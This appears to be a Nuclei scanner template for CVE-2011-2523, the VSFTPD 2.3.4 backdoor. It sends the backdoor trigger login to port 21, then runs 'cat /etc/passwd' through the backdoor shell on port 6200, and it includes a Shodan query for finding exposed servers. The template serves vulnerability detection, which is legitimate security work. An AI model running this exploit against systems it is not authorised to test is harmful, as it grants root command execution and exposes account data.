id: CVE-2011-2523

info:
  name: VSFTPD 2.3.4 - Backdoor Command Execution
  author: pussycat0x
  severity: critical
  description: |
    VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
  reference: |
    - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
    - https://www.exploit-db.com/exploits/49757
  remediation: |
    Update to the latest version of VSFTPD, which does not contain the backdoor.
  classification:
    cve-id: CVE-2011-2523
  metadata:
    verified: "true"
    shodan-query: product:"vsftpd"
  tags: cve,cve2011,network,vsftpd,ftp,backdoor

variables:
  cmd: "cat /etc/passwd"  # shows the the user and group names and numeric IDs


network:
  - inputs:
      - data: "USER letmein:)\r\nPASS please\r\n"
        read: 100
    host:
      - "{{Hostname}}:21"

  - inputs:
      - data: "{{cmd}}\n"
        read: 100
    host:
      - "{{Hostname}}:6200"

    matchers:
      - type: regex
        part: raw
        regex:
          - "root:.*:0:0:"